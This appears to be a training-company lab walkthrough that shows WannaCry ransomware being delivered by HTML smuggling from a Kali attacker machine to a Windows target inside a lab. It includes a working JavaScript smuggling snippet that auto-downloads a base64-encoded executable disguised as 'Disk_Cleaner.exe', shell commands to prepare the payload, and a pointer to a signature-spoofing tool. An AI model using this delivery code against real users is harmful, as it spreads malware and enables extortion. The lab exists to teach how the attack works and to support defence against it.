Resources
    Lab Walkthrough - The Wan ...
    23 August 22

    Lab Walkthrough - The WannaCry Ransomware

    Posted byAshish Bhangale
    facebooktwitterlinkedin
    news-featured

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Introduction

    In May 2017, a worldwide ransomware attack infamously known as WannaCry was set in motion. It targeted Microsoft Windows operating system by encrypting the data on the victim’s machine and seeking ransom in exchange for a promise to decrypt all the encrypted files and potentially undo the damage, but that’s far from the truth, as we discuss further! This ransomware made use of the EternalBlue, an exploit of Microsoft’s implementation of their SMB protocol, released by The Shadow Brokers hacker group in April 2017, to gain access to remote Windows machines in most cases. However, it also made use of DoublePulsar backdoor to spread itself from the infected machines.

    Ransomware damages would cost the world $5 billion (USD) in 2017. The damages for 2018 were predicted to reach $8 billion; for 2019, the figure was $11.5 billion, and in 2021 it was $20 billion.

    1_cSYtxdTgSVA1_wPV_xbzBA.jpeg

    Reference: https://cybersecurityventures.com/global-ransomware-damage-costs-predicted-to-reach-250-billion-usd-by-2031/

    Similar types of attacks are still active. From 2017 until now, various ransomwares have been created under different names. Even after paying the ransom, there is no guarantee that your data will be decrypted again.

    Who is a target for ransomware?

    According to Josh Fruhlinger's article Ransomware Explained, "there are several different ways attackers choose the organizations they target with ransomware. Sometimes it’s a matter of opportunity: for instance, attackers might target universities because they tend to have smaller security teams and a disparate user base that does a lot of file sharing, making it easier to penetrate their defenses.

    On the other hand, some organizations are tempting targets because they seem more likely to pay a ransom quickly. For instance, government agencies or medical facilities often need immediate access to their files. Law firms and other organizations with sensitive data may be willing to pay to keep news of a compromise quiet — and these organizations may be uniquely sensitive to leakware attacks."

    1_pV0hR-TsKg-jijiJtisuvA.png

    Lab Environment

    In our lab, we will learn how an attacker can use HTML smuggling to deliver the WannaCry executable to the target user. And how running this executable will encrypt the data/files on the target user’s machine, holding him on ransom to get that data back.

    Lab Link: https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/4b63157f-62c0-4deb-a3bd-617077cfcae2

    1__xpJ-w_0tsK-uJm2y6T8ag.png

    The user is going to get access to a Kali GUI instance and Windows Server 2019. The Kali machine will play the part of the attacker machine, whereas the Windows machine will be the target user’s machine.

    Objective: Deliver the WannaCry executable to the Windows machine using HTML smuggling and execute it to observe the working of WannaCry ransomware!

    Tools

    The best tools for this lab are:

    • Chrome Browser
    • Apache Web Server

    The wannacry.exe executable is located in: /root/Desktop/tools/ folder.

    Solution

    Step 1: Open the lab link to access the Kali GUI instance and target machine

    Kali GUI

    1_n3UC4MxDg-XJ2a7s1PFfEQ.jpeg

    Target Machine

    1_oA6pBl1aLI2C0enuNXiXDQ.jpeg

    We can notice that the link to the chrome browser and Important Files folder are present on the Desktop.

    Step 2: There is a ready-made HTML template available in /root/Desktop/tool/html-templates folder. We will copy these files to the Apache web server’s root folder.

    HTLM template Source: https://templatemo.com/tm-519-beauty

    Note: Remove all existing files from the Apache web server’s root folder before moving above mentioned files.

    Commands:

    rm -rf /var/www/html/*ls /var/www/html/
    1_QZ_FVG6LED7n5QyZRD6Vvg.jpeg

    Step 3: The Wannacry Ransomware executable is present in /root/Desktop/tools/ folder. i.e wannacry.zip. We need to unzip the archive to access the executable

    Commands:

    cd /root/Desktop/toolsunzip wannacry.zipfile wanncry.exe
    1_u1xrXlSKYJiVRBf4MY8y2g.jpeg

    The WannaCry ransomware attack was the most notorious and highly controversial worldwide cyberattack that happened in May 2017. It targets the Windows operating system by encrypting data and demanding ransom payments in the form of cryptocurrency (Bitcoin).

    For more information: https://en.wikipedia.org/wiki/WannaCry_ransomware_attack

    We are going to use an HTML template and modify the `index.html` file to deliver the ransomware.

    Step 4: Copy the HTML template files to the web server’s root folder.

    Commands:

    cp -rf /root/Desktop/tools/html-templates/* /var/www/html/ls /var/www/html/
    1_quoMy5zkFaAHmlwDW6cd7g.jpeg

    Modify the index.html file and paste the below code under the HTML <body> tag.

    <script> function base64ToArrayBuffer(base64) { var binary_string = window.atob(base64); var len = binary_string.length; var bytes = new Uint8Array( len ); for (var i = 0; i < len; i++) { bytes[i] =  binary_string.charCodeAt(i); } return bytes.buffer; } var file ='<backdoor.exe Base64 Encoded Value>' var data = base64ToArrayBuffer(file); var blob = new Blob([data], {type: 'octet/stream'}); var fileName = 'Disk_Cleaner.exe'; var a = document.createElement('a'); document.body.appendChild(a); a.style = 'display: none'; var url = window.URL.createObjectURL(blob); a.href = url; a.download = fileName; a.click(); window.URL.revokeObjectURL(url);</script>
    1_13Jr4XRE_QRbNUjGOsgAGw.jpeg

    HTML smuggling is a well-known phishing campaign technique that uses HTML5 and Javascript to hide malicious executables or payloads. When a target user opens the HTML in their web browser, the browser decodes the malicious JS code and delivers the payload to the machine. According to Microsoft:

    A highly evasive malware delivery technique that leverages legitimate HTML5 and JavaScript features, is increasingly used in email campaigns that deploy banking malware, remote access Trojans (RATs), and other payloads related to targeted attacks. Notably, this technique was observed in a spear-phishing campaign from the threat actor NOBELIUM in May. More recently, we have also seen this technique deliver the banking Trojan Mekotio, as well as AsyncRAT/NJRAT and Trickbot, malware that attackers utilize to gain control of affected devices and deliver ransomware payloads and other threats.

    Step 5: The web server is all set. Now, we need to copy the base64-encoded of WannaCry executable (wanncry.exe) to the clipboard using the xsel utility.

    Command:

    base64 -w0 /root/Desktop/tools/wanncry.exe | xsel — clipboard
    1_OP7gxLl2F9MUCgOi6giD4g.jpeg

    Step 6: Paste the base64 encoded value to replace `<backdoor.exe Base64 Encoded Value>` i.e `var file`

    Note: Once we paste the value, it might take up to 1–2 minutes. Please wait patiently.

    1_Qj_J-O1Slu4VpYG3OTIzsQ.jpeg

    We have successfully fulfilled all the requirements to create an HTML smuggling webserver to distribute the wannacry.exe executable.

    Step 7: Start the apache webserver

    Command:

    /etc/init.d/apache2 start
    1_S7t3KJMvpNOSBaST5KHEDw.jpeg

    Step 8: We need the attacker machine’s IP address to access the malicious web server from the Windows host. Check the IP address with:

    Command:

    ip addr
    1_bG6O4n4bpSXhlbSjnXUM3Q.jpeg

    The IP Address of the attacker (Kali Machine) is 10.10.15.2

    Step 9: Now, switch the view to the Target Machine:

    1_dehfqbpg4_2PLh42p2aA5A.jpeg

    We notice an “Important Files” folder on the Desktop containing two files, i.e INE.jpg and office.pdf.

    1_o7mtKxMsiulyG4OZC4kazA.jpeg

    Step 10: Check both the files:

    Opening INE.jpg file

    1_yeTXN3u4p4I1zfQuazBnMQ.jpeg

    Opening office.pdf file

    1_HDWwSqs0BNXjL1L27V1ooQ.jpeg

    We can access both files without any issue.

    Step 11: Open the web browser on the Windows machine and browse to the portal hosted by the attacker.

    IP Address: 10.10.15.2

    1_MqslS8LCO4F45iXVwnhGCQ.jpeg

    We can notice that the file Disk_Cleaner.exe got downloaded automatically without any action from the user’s side. This confirmed that the JavaScript code for HTTP smuggling worked and delivered the wanncry.exe malicious executable to the target machine.

    1_4r0MOhTFtxbxNzbDH-8fYA.jpeg

    The chrome browser blocked the executable because it’s an unsigned executable. It is important to understand that it is not happening because the file is a malicious executable.

    There are many tools to bypass this. One such popular tool is SigThief.

    Reference: https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

    Step 12: Execute the Disk_Cleaner.exe executable.

    The file is downloaded in the C:\Users\Administrator\Downloads\ folder.

    1_h6lrrKOuPUjj2Bi5AT8s-w.jpeg

    Again, we have received another Windows “Open File — Security Warning” message. This is also because the executable doesn’t have a valid signature.

    We will click on Run:

    1_fnkNIdLuXbS3t8aA4B47Qg.jpeg

    Once we click yes, wanncry.exe starts encrypting all the files on the system and changes all file extensions to .WNCRY.

    Here is the full list of file extensions that were searched on the windows machine and encrypted by the WannaCry ransomware: https://gist.github.com/xpn/facb5692980c14df272b16a4ee6a29d5

    As soon as the WannaCry ransomware encrypts all the files, it will show a random message demanding payment in cryptocurrency (Bitcoin).

    1_U1Rj2qz2zS4piYrqm4U7Qw.jpeg

    The countdown is also shown to the user. If the user fails to pay the ransom, the attacker will delete the encryption key, and the data will remain encrypted.

    A Bitcoin address is shown in the message. If we analyze that bitcoin address on BlockChair: (https://blockchair.com/bitcoin/address/13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94).

    We can see that people are still making payments to that address.

    BitCoin Address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

    1_eOUrWQ1V8lvAgRA-BYx41Q.jpeg

    Try to check the files present in the Important Files folder, i.e, INE.jpg, and office.pdf. You won’t be able to open them this time as they are encrypted by ransomware.

    1_9LM6GqOWTuGvXjWsYMsYzQ.jpeg

    How we can prevent such attacks?

    We must keep the Windows operating system fully updated and never download or execute doubtful/untrusted executables. Also, some important actions could save you from this type of advanced attack:

    • Take a backup of all your data
    • Install Antivirus Software & Firewalls
    • Keep All Systems And Software Updated

    References

    1. https://en.wikipedia.org/wiki/WannaCry_ransomware_attack

    2. https://outflank.nl/blog/2018/08/14/html-smuggling-explained

    3. https://www.upguard.com/blog/best-practices-to-prevent-ransomware-attacks

    Try HTML Smuggling and executing the Wannacry Ransomware in this lab to understand it! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    © 2024 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.
    instagram Logofacebook Logotwitter Logolinkedin Logoyoutube Logo